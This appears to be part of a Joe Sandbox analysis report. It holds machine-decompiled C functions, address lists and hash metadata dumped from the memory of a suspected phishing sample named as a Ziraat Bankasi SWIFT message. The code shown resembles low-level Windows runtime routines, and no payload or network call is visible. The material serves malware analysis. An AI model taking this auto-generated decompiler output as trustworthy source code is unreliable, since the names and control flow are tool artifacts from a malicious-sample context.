                                                                    						_v56 = 0;
                                                                    						_v52 = 0x19853e8;
                                                                    						_v48 = 0;
                                                                    						_v40 = 0;
                                                                    						_v36 = 0x19853e8;
                                                                    						_v32 = 0;
                                                                    						_v28 =  &_v164;
                                                                    						_v24 = 0;
                                                                    						_v20 = _t70;
                                                                    						_v16 = 0;
                                                                    						_t69 = 0x187bc46;
                                                                    						_t48 = E01917B9C(0x19853e8, 0x187bc46, _t67, 0x19853e8, _t70,  &_v140);
                                                                    					}
                                                                    				}
                                                                    				return E018DB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                                    			}











































                                                                    0x018d8ec7
                                                                    0x018d8ed9
                                                                    0x018d8edc
                                                                    0x018d8ee6
                                                                    0x018d8ee9
                                                                    0x018d8eee
                                                                    0x018d8efc
                                                                    0x018d8f08
                                                                    0x01911349
                                                                    0x01911353
                                                                    0x0191135d
                                                                    0x01911366
                                                                    0x0191136f
                                                                    0x01911375
                                                                    0x0191137c
                                                                    0x01911385
                                                                    0x01911390
                                                                    0x01911391
                                                                    0x0191139c
                                                                    0x0191139d
                                                                    0x019113a6
                                                                    0x019113ac
                                                                    0x019113b2
                                                                    0x019113b5
                                                                    0x019113bc
                                                                    0x019113bf
                                                                    0x019113c2
                                                                    0x019113c5
                                                                    0x019113c8
                                                                    0x019113cb
                                                                    0x019113ce
                                                                    0x019113d1
                                                                    0x019113d4
                                                                    0x019113d7
                                                                    0x019113da
                                                                    0x019113dd
                                                                    0x019113e0
                                                                    0x019113e3
                                                                    0x019113e6
                                                                    0x019113e9
                                                                    0x019113f6
                                                                    0x01911400
                                                                    0x01911400
                                                                    0x018d8f08
                                                                    0x018d8f32

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bf997a9c5743d79840319d050ac456317a608eccd849fd3f7d57debed4ce7de2
                                                                    • Instruction ID: e212c45846da9bc63c05ae9bf70e9a79d4c99f7b4a2153d63c6298461f6bdc0b
                                                                    • Opcode Fuzzy Hash: bf997a9c5743d79840319d050ac456317a608eccd849fd3f7d57debed4ce7de2
                                                                    • Instruction Fuzzy Hash: DE4180B1D003189EDB24CFAAD981AADFBF8FB48710F5081AEE509E7640D7749A84CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 74%
                                                                    			E018CE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                                    				intOrPtr* _v0;
                                                                    				signed char _v4;
                                                                    				signed int _v8;
                                                                    				void* __ecx;
                                                                    				void* __ebp;
                                                                    				void* _t37;
                                                                    				intOrPtr _t38;
                                                                    				signed int _t44;
                                                                    				signed char _t52;
                                                                    				void* _t54;
                                                                    				intOrPtr* _t56;
                                                                    				void* _t58;
                                                                    				char* _t59;
                                                                    				signed int _t62;
                                                                    
                                                                    				_t58 = __edx;
                                                                    				_push(0);
                                                                    				_push(4);
                                                                    				_push( &_v8);
                                                                    				_push(0x24);
                                                                    				_push(0xffffffff);
                                                                    				if(E018D9670() < 0) {
                                                                    					E018EDF30(_t54, _t58, _t35);
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					_push(_t54);
                                                                    					_t52 = _v4;
                                                                    					if(_t52 > 8) {
                                                                    						_t37 = 0xc0000078;
                                                                    					} else {
                                                                    						_t38 =  *0x1987b9c; // 0x0
                                                                    						_t62 = _t52 & 0x000000ff;
                                                                    						_t59 = L018B4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                                    						if(_t59 == 0) {
                                                                    							_t37 = 0xc0000017;
                                                                    						} else {
                                                                    							_t56 = _v0;
                                                                    							 *(_t59 + 1) = _t52;
                                                                    							 *_t59 = 1;
                                                                    							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                                    							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                                    							_t44 = _t62 - 1;
                                                                    							if(_t44 <= 7) {
                                                                    								switch( *((intOrPtr*)(_t44 * 4 +  &M018CE810))) {
                                                                    									case 0:
                                                                    										L6:
                                                                    										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                                    										goto L7;
                                                                    									case 1:
                                                                    										L13:
                                                                    										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                                    										goto L6;
                                                                    									case 2:
                                                                    										L12:
                                                                    										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                                    										goto L13;
                                                                    									case 3:
                                                                    										L11:
                                                                    										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                                    										goto L12;
                                                                    									case 4:
                                                                    										L10:
                                                                    										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                                    										goto L11;
                                                                    									case 5:
                                                                    										L9:
                                                                    										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                                    										goto L10;
                                                                    									case 6:
                                                                    										L17:
                                                                    										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                                    										goto L9;
                                                                    									case 7:
                                                                    										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                                    										goto L17;
                                                                    								}
                                                                    							}
                                                                    							L7:
                                                                    							 *_a40 = _t59;
                                                                    							_t37 = 0;
                                                                    						}
                                                                    					}
                                                                    					return _t37;
                                                                    				} else {
                                                                    					_push(0x20);
                                                                    					asm("ror eax, cl");
                                                                    					return _a4 ^ _v8;
                                                                    				}
                                                                    			}

















                                                                    0x018ce730
                                                                    0x018ce736
                                                                    0x018ce738
                                                                    0x018ce73d
                                                                    0x018ce73e
                                                                    0x018ce740
                                                                    0x018ce749
                                                                    0x018ce765
                                                                    0x018ce76a
                                                                    0x018ce76b
                                                                    0x018ce76c
                                                                    0x018ce76d
                                                                    0x018ce76e
                                                                    0x018ce76f
                                                                    0x018ce775
                                                                    0x018ce777
                                                                    0x018ce77e
                                                                    0x0190b675
                                                                    0x018ce784
                                                                    0x018ce784
                                                                    0x018ce789
                                                                    0x018ce7a8
                                                                    0x018ce7ac
                                                                    0x018ce807
                                                                    0x018ce7ae
                                                                    0x018ce7ae
                                                                    0x018ce7b1
                                                                    0x018ce7b4
                                                                    0x018ce7b9
                                                                    0x018ce7c0
                                                                    0x018ce7c4
                                                                    0x018ce7ca
                                                                    0x018ce7cc
                                                                    0x00000000
                                                                    0x018ce7d3
                                                                    0x018ce7d6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ce7ff
                                                                    0x018ce802
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ce7f9
                                                                    0x018ce7fc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ce7f3
                                                                    0x018ce7f6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ce7ed
                                                                    0x018ce7f0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ce7e7
                                                                    0x018ce7ea
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0190b685
                                                                    0x0190b688
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0190b682
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ce7cc
                                                                    0x018ce7d9
                                                                    0x018ce7dc
                                                                    0x018ce7de
                                                                    0x018ce7de
                                                                    0x018ce7ac
                                                                    0x018ce7e4
                                                                    0x018ce74b
                                                                    0x018ce751
                                                                    0x018ce759
                                                                    0x018ce761
                                                                    0x018ce761

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd118d5a15fff799a96d4ccb017008d7fa3d6b1313ebe1b95710bc7a0f3b7e4e
                                                                    • Instruction ID: da89dcd52666d935d57c5b22196170a8514c6c50d75a42b31f11aa589d54e5f9
                                                                    • Opcode Fuzzy Hash: fd118d5a15fff799a96d4ccb017008d7fa3d6b1313ebe1b95710bc7a0f3b7e4e
                                                                    • Instruction Fuzzy Hash: 65319175A14249EFD744CF58D845F9ABBE8FB09714F14825AF908CB341D631EE90CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 67%
                                                                    			E018CBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				intOrPtr _t22;
                                                                    				intOrPtr* _t41;
                                                                    				intOrPtr _t51;
                                                                    
                                                                    				_t51 =  *0x1986100; // 0x5
                                                                    				_v12 = __edx;
                                                                    				_v8 = __ecx;
                                                                    				if(_t51 >= 0x800) {
                                                                    					L12:
                                                                    					return 0;
                                                                    				} else {
                                                                    					goto L1;
                                                                    				}
                                                                    				while(1) {
                                                                    					L1:
                                                                    					_t22 = _t51;
                                                                    					asm("lock cmpxchg [ecx], edx");
                                                                    					if(_t51 == _t22) {
                                                                    						break;
                                                                    					}
                                                                    					_t51 = _t22;
                                                                    					if(_t22 < 0x800) {
                                                                    						continue;
                                                                    					}
                                                                    					goto L12;
                                                                    				}
                                                                    				E018B2280(0xd, 0x7f9f1a0);
                                                                    				_t41 =  *0x19860f8; // 0x0
                                                                    				if(_t41 != 0) {
                                                                    					 *0x19860f8 =  *_t41;
                                                                    					 *0x19860fc =  *0x19860fc + 0xffff;
                                                                    				}
                                                                    				E018AFFB0(_t41, 0x800, 0x7f9f1a0);
                                                                    				if(_t41 != 0) {
                                                                    					L6:
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                                    					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                                    					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                                    					do {
                                                                    						asm("lock xadd [0x19860f0], ax");
                                                                    						 *((short*)(_t41 + 0x34)) = 1;
                                                                    					} while (1 == 0);
                                                                    					goto L8;
                                                                    				} else {
                                                                    					_t41 = L018B4620(0x1986100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                                    					if(_t41 == 0) {
                                                                    						L11:
                                                                    						asm("lock dec dword [0x1986100]");
                                                                    						L8:
                                                                    						return _t41;
                                                                    					}
                                                                    					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                                    					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                                    					if(_t41 == 0) {
                                                                    						goto L11;
                                                                    					}
                                                                    					goto L6;
                                                                    				}
                                                                    			}










                                                                    0x018cbc36
                                                                    0x018cbc42
                                                                    0x018cbc45
                                                                    0x018cbc4a
                                                                    0x018cbd35
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018cbc50
                                                                    0x018cbc50
                                                                    0x018cbc58
                                                                    0x018cbc5a
                                                                    0x018cbc60
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0190a4f2
                                                                    0x0190a4f6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0190a4fc
                                                                    0x018cbc79
                                                                    0x018cbc7e
                                                                    0x018cbc86
                                                                    0x018cbd16
                                                                    0x018cbd20
                                                                    0x018cbd20
                                                                    0x018cbc8d
                                                                    0x018cbc94
                                                                    0x018cbcbd
                                                                    0x018cbcca
                                                                    0x018cbccb
                                                                    0x018cbccc
                                                                    0x018cbccd
                                                                    0x018cbcce
                                                                    0x018cbcd4
                                                                    0x018cbcea
                                                                    0x018cbcee
                                                                    0x018cbcf2
                                                                    0x018cbd00
                                                                    0x018cbd04
                                                                    0x00000000
                                                                    0x018cbc96
                                                                    0x018cbcab
                                                                    0x018cbcaf
                                                                    0x018cbd2c
                                                                    0x018cbd2c
                                                                    0x018cbd09
                                                                    0x00000000
                                                                    0x018cbd09
                                                                    0x018cbcb1
                                                                    0x018cbcb5
                                                                    0x018cbcbb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018cbcbb

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 59712e7083472af6e73383cfa998e92633a0156386cd0b2ad825ed68278682cc
                                                                    • Instruction ID: 23cc21add9d58f08ff7b6c1b71dff4bebe4a60aa4419d36b8c7049e87daf9ae8
                                                                    • Opcode Fuzzy Hash: 59712e7083472af6e73383cfa998e92633a0156386cd0b2ad825ed68278682cc
                                                                    • Instruction Fuzzy Hash: CA310132A04A169FDB11DF9CD4817AA73B4FF18751F040078EE09DF246EB74DA068B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 60%
                                                                    			E018C1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                    				char _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr* _v20;
                                                                    				void* _t22;
                                                                    				char _t23;
                                                                    				void* _t36;
                                                                    				intOrPtr _t42;
                                                                    				intOrPtr _t43;
                                                                    
                                                                    				_v12 = __ecx;
                                                                    				_t43 = 0;
                                                                    				_v20 = __edx;
                                                                    				_t42 =  *__edx;
                                                                    				 *__edx = 0;
                                                                    				_v16 = _t42;
                                                                    				_push( &_v8);
                                                                    				_push(0);
                                                                    				_push(0);
                                                                    				_push(6);
                                                                    				_push(0);
                                                                    				_push(__ecx);
                                                                    				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                                    				_push(_t36);
                                                                    				_t22 = E018BF460();
                                                                    				if(_t22 < 0) {
                                                                    					if(_t22 == 0xc0000023) {
                                                                    						goto L1;
                                                                    					}
                                                                    					L3:
                                                                    					return _t43;
                                                                    				}
                                                                    				L1:
                                                                    				_t23 = _v8;
                                                                    				if(_t23 != 0) {
                                                                    					_t38 = _a4;
                                                                    					if(_t23 >  *_a4) {
                                                                    						_t42 = L018B4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                                    						if(_t42 == 0) {
                                                                    							goto L3;
                                                                    						}
                                                                    						_t23 = _v8;
                                                                    					}
                                                                    					_push( &_v8);
                                                                    					_push(_t23);
                                                                    					_push(_t42);
                                                                    					_push(6);
                                                                    					_push(_t43);
                                                                    					_push(_v12);
                                                                    					_push(_t36);
                                                                    					if(E018BF460() < 0) {
                                                                    						if(_t42 != 0 && _t42 != _v16) {
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                                    						}
                                                                    						goto L3;
                                                                    					}
                                                                    					 *_v20 = _t42;
                                                                    					 *_a4 = _v8;
                                                                    				}
                                                                    				_t43 = 1;
                                                                    				goto L3;
                                                                    			}












                                                                    0x018c1dc2
                                                                    0x018c1dc5
                                                                    0x018c1dc7
                                                                    0x018c1dcc
                                                                    0x018c1dce
                                                                    0x018c1dd6
                                                                    0x018c1ddf
                                                                    0x018c1de0
                                                                    0x018c1de1
                                                                    0x018c1de5
                                                                    0x018c1de8
                                                                    0x018c1def
                                                                    0x018c1df0
                                                                    0x018c1df6
                                                                    0x018c1df7
                                                                    0x018c1dfe
                                                                    0x018c1e1a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c1e0b
                                                                    0x018c1e12
                                                                    0x018c1e12
                                                                    0x018c1e00
                                                                    0x018c1e00
                                                                    0x018c1e05
                                                                    0x018c1e1e
                                                                    0x018c1e23
                                                                    0x0190570f
                                                                    0x01905713
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01905719
                                                                    0x01905719
                                                                    0x018c1e2c
                                                                    0x018c1e2d
                                                                    0x018c1e2e
                                                                    0x018c1e2f
                                                                    0x018c1e31
                                                                    0x018c1e32
                                                                    0x018c1e35
                                                                    0x018c1e3d
                                                                    0x01905723
                                                                    0x0190573d
                                                                    0x0190573d
                                                                    0x00000000
                                                                    0x01905723
                                                                    0x018c1e49
                                                                    0x018c1e4e
                                                                    0x018c1e4e
                                                                    0x018c1e09
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                    • Instruction ID: e8c02f38bb09b7f5d84d09fbcf757e8378d33c0cadf3728fbab54b9c232be164
                                                                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                    • Instruction Fuzzy Hash: 99215A72A00219EBD721CF99DCC4EAABBB9EB85B44F114059EA05DB251D634EE01DBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 76%
                                                                    			E01899100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                    				signed int _t53;
                                                                    				signed int _t56;
                                                                    				signed int* _t60;
                                                                    				signed int _t63;
                                                                    				signed int _t66;
                                                                    				signed int _t69;
                                                                    				void* _t70;
                                                                    				intOrPtr* _t72;
                                                                    				void* _t78;
                                                                    				void* _t79;
                                                                    				signed int _t80;
                                                                    				intOrPtr _t82;
                                                                    				void* _t85;
                                                                    				void* _t88;
                                                                    				void* _t89;
                                                                    
                                                                    				_t84 = __esi;
                                                                    				_t70 = __ecx;
                                                                    				_t68 = __ebx;
                                                                    				_push(0x2c);
                                                                    				_push(0x196f6e8);
                                                                    				E018ED0E8(__ebx, __edi, __esi);
                                                                    				 *((char*)(_t85 - 0x1d)) = 0;
                                                                    				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                    				if(_t82 == 0) {
                                                                    					L4:
                                                                    					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                                    						E019688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                                    					}
                                                                    					L5:
                                                                    					return E018ED130(_t68, _t82, _t84);
                                                                    				}
                                                                    				_t88 = _t82 -  *0x19886c0; // 0x14407b0
                                                                    				if(_t88 == 0) {
                                                                    					goto L4;
                                                                    				}
                                                                    				_t89 = _t82 -  *0x19886b8; // 0x0
                                                                    				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                    					goto L4;
                                                                    				} else {
                                                                    					E018B2280(_t82 + 0xe0, _t82 + 0xe0);
                                                                    					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                    					__eflags =  *((char*)(_t82 + 0xe5));
                                                                    					if(__eflags != 0) {
                                                                    						E019688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                                    						goto L12;
                                                                    					} else {
                                                                    						__eflags =  *((char*)(_t82 + 0xe4));
                                                                    						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                                    							 *((char*)(_t82 + 0xe4)) = 1;
                                                                    							_push(_t82);
                                                                    							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                                    							E018DAFD0();
                                                                    						}
                                                                    						while(1) {
                                                                    							_t60 = _t82 + 8;
                                                                    							 *(_t85 - 0x2c) = _t60;
                                                                    							_t68 =  *_t60;
                                                                    							_t80 = _t60[1];
                                                                    							 *(_t85 - 0x28) = _t68;
                                                                    							 *(_t85 - 0x24) = _t80;
                                                                    							while(1) {
                                                                    								L10:
                                                                    								__eflags = _t80;
                                                                    								if(_t80 == 0) {
                                                                    									break;
                                                                    								}
                                                                    								_t84 = _t68;
                                                                    								 *(_t85 - 0x30) = _t80;
                                                                    								 *(_t85 - 0x24) = _t80 - 1;
                                                                    								asm("lock cmpxchg8b [edi]");
                                                                    								_t68 = _t84;
                                                                    								 *(_t85 - 0x28) = _t68;
                                                                    								 *(_t85 - 0x24) = _t80;
                                                                    								__eflags = _t68 - _t84;
                                                                    								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                    								if(_t68 != _t84) {
                                                                    									continue;
                                                                    								}
                                                                    								__eflags = _t80 -  *(_t85 - 0x30);
                                                                    								if(_t80 !=  *(_t85 - 0x30)) {
                                                                    									continue;
                                                                    								}
                                                                    								__eflags = _t80;
                                                                    								if(_t80 == 0) {
                                                                    									break;
                                                                    								}
                                                                    								_t63 = 0;
                                                                    								 *(_t85 - 0x34) = 0;
                                                                    								_t84 = 0;
                                                                    								__eflags = 0;
                                                                    								while(1) {
                                                                    									 *(_t85 - 0x3c) = _t84;
                                                                    									__eflags = _t84 - 3;
                                                                    									if(_t84 >= 3) {
                                                                    										break;
                                                                    									}
                                                                    									__eflags = _t63;
                                                                    									if(_t63 != 0) {
                                                                    										L40:
                                                                    										_t84 =  *_t63;
                                                                    										__eflags = _t84;
                                                                    										if(_t84 != 0) {
                                                                    											_t84 =  *(_t84 + 4);
                                                                    											__eflags = _t84;
                                                                    											if(_t84 != 0) {
                                                                    												 *0x198b1e0(_t63, _t82);
                                                                    												 *_t84();
                                                                    											}
                                                                    										}
                                                                    										do {
                                                                    											_t60 = _t82 + 8;
                                                                    											 *(_t85 - 0x2c) = _t60;
                                                                    											_t68 =  *_t60;
                                                                    											_t80 = _t60[1];
                                                                    											 *(_t85 - 0x28) = _t68;
                                                                    											 *(_t85 - 0x24) = _t80;
                                                                    											goto L10;
                                                                    										} while (_t63 == 0);
                                                                    										goto L40;
                                                                    									}
                                                                    									_t69 = 0;
                                                                    									__eflags = 0;
                                                                    									while(1) {
                                                                    										 *(_t85 - 0x38) = _t69;
                                                                    										__eflags = _t69 -  *0x19884c0;
                                                                    										if(_t69 >=  *0x19884c0) {
                                                                    											break;
                                                                    										}
                                                                    										__eflags = _t63;
                                                                    										if(_t63 != 0) {
                                                                    											break;
                                                                    										}
                                                                    										_t66 = E01969063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                                    										__eflags = _t66;
                                                                    										if(_t66 == 0) {
                                                                    											_t63 = 0;
                                                                    											__eflags = 0;
                                                                    										} else {
                                                                    											_t63 = _t66 + 0xfffffff4;
                                                                    										}
                                                                    										 *(_t85 - 0x34) = _t63;
                                                                    										_t69 = _t69 + 1;
                                                                    									}
                                                                    									_t84 = _t84 + 1;
                                                                    								}
                                                                    								__eflags = _t63;
                                                                    							}
                                                                    							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                                    							 *((char*)(_t82 + 0xe5)) = 1;
                                                                    							 *((char*)(_t85 - 0x1d)) = 1;
                                                                    							L12:
                                                                    							 *(_t85 - 4) = 0xfffffffe;
                                                                    							E0189922A(_t82);
                                                                    							_t53 = E018B7D50();
                                                                    							__eflags = _t53;
                                                                    							if(_t53 != 0) {
                                                                    								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    							} else {
                                                                    								_t56 = 0x7ffe0386;
                                                                    							}
                                                                    							__eflags =  *_t56;
                                                                    							if( *_t56 != 0) {
                                                                    								_t56 = E01968B58(_t82);
                                                                    							}
                                                                    							__eflags =  *((char*)(_t85 - 0x1d));
                                                                    							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                                    								__eflags = _t82 -  *0x19886c0; // 0x14407b0
                                                                    								if(__eflags != 0) {
                                                                    									__eflags = _t82 -  *0x19886b8; // 0x0
                                                                    									if(__eflags == 0) {
                                                                    										_t79 = 0x19886bc;
                                                                    										_t72 = 0x19886b8;
                                                                    										goto L18;
                                                                    									}
                                                                    									__eflags = _t56 | 0xffffffff;
                                                                    									asm("lock xadd [edi], eax");
                                                                    									if(__eflags == 0) {
                                                                    										E01899240(_t68, _t82, _t82, _t84, __eflags);
                                                                    									}
                                                                    								} else {
                                                                    									_t79 = 0x19886c4;
                                                                    									_t72 = 0x19886c0;
                                                                    									L18:
                                                                    									E018C9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                                    								}
                                                                    							}
                                                                    							goto L5;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}


















                                                                    0x01899100
                                                                    0x01899100
                                                                    0x01899100
                                                                    0x01899100
                                                                    0x01899102
                                                                    0x01899107
                                                                    0x0189910c
                                                                    0x01899110
                                                                    0x01899115
                                                                    0x01899136
                                                                    0x01899143
                                                                    0x018f37e4
                                                                    0x018f37e4
                                                                    0x01899149
                                                                    0x0189914e
                                                                    0x0189914e
                                                                    0x01899117
                                                                    0x0189911d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0189911f
                                                                    0x01899125
                                                                    0x00000000
                                                                    0x01899151
                                                                    0x01899158
                                                                    0x0189915d
                                                                    0x01899161
                                                                    0x01899168
                                                                    0x018f3715
                                                                    0x00000000
                                                                    0x0189916e
                                                                    0x0189916e
                                                                    0x01899175
                                                                    0x01899177
                                                                    0x0189917e
                                                                    0x0189917f
                                                                    0x01899182
                                                                    0x01899182
                                                                    0x01899187
                                                                    0x01899187
                                                                    0x0189918a
                                                                    0x0189918d
                                                                    0x0189918f
                                                                    0x01899192
                                                                    0x01899195
                                                                    0x01899198
                                                                    0x01899198
                                                                    0x01899198
                                                                    0x0189919a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f371f
                                                                    0x018f3721
                                                                    0x018f3727
                                                                    0x018f372f
                                                                    0x018f3733
                                                                    0x018f3735
                                                                    0x018f3738
                                                                    0x018f373b
                                                                    0x018f373d
                                                                    0x018f3740
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f3746
                                                                    0x018f3749
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f374f
                                                                    0x018f3751
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f3757
                                                                    0x018f3759
                                                                    0x018f375c
                                                                    0x018f375c
                                                                    0x018f375e
                                                                    0x018f375e
                                                                    0x018f3761
                                                                    0x018f3764
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f3766
                                                                    0x018f3768
                                                                    0x018f37a3
                                                                    0x018f37a3
                                                                    0x018f37a5
                                                                    0x018f37a7
                                                                    0x018f37ad
                                                                    0x018f37b0
                                                                    0x018f37b2
                                                                    0x018f37bc
                                                                    0x018f37c2
                                                                    0x018f37c2
                                                                    0x018f37b2
                                                                    0x01899187
                                                                    0x01899187
                                                                    0x0189918a
                                                                    0x0189918d
                                                                    0x0189918f
                                                                    0x01899192
                                                                    0x01899195
                                                                    0x00000000
                                                                    0x01899195
                                                                    0x00000000
                                                                    0x01899187
                                                                    0x018f376a
                                                                    0x018f376a
                                                                    0x018f376c
                                                                    0x018f376c
                                                                    0x018f376f
                                                                    0x018f3775
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f3777
                                                                    0x018f3779
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f3782
                                                                    0x018f3787
                                                                    0x018f3789
                                                                    0x018f3790
                                                                    0x018f3790
                                                                    0x018f378b
                                                                    0x018f378b
                                                                    0x018f378b
                                                                    0x018f3792
                                                                    0x018f3795
                                                                    0x018f3795
                                                                    0x018f3798
                                                                    0x018f3798
                                                                    0x018f379b
                                                                    0x018f379b
                                                                    0x018991a3
                                                                    0x018991a9
                                                                    0x018991b0
                                                                    0x018991b4
                                                                    0x018991b4
                                                                    0x018991bb
                                                                    0x018991c0
                                                                    0x018991c5
                                                                    0x018991c7
                                                                    0x018f37da
                                                                    0x018991cd
                                                                    0x018991cd
                                                                    0x018991cd
                                                                    0x018991d2
